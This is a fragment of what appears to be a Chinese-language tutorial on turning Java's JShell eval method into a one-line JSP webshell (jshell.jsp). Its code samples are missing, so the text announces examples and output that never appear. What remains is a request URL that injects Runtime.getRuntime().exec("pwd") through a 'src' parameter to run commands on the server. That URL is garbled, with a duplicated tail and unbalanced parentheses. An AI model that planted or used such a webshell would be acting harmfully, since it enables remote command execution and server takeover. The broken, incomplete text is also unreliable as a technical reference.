JShell

    命令行执行即可进入jshell模式:

    输入:/help可以查看具体的命令:

    jshell调用了类的eval方法来执行我们的代码片段,那么我们只要想办法调用这个eval方法也就可以实现真正意义上的一句话木马了。

    jshell.jsp一句话木马示例:

    程序执行后会输出一些不必要的信息,如果有强迫症可以修改为:

    Java 9java.io.InputStream类正好提供了一个readAllBytes方法,我们从此以后再也不需要按字节读取了。

    浏览器请求:http://localhost:8080/jshell.jsp?src=new%20String(Runtime.getRuntime().exec(%22pwd%22).getInputStream().readAllBytes()).exec(“pwd”).getInputStream().readAllBytes()))

    程序执行结果: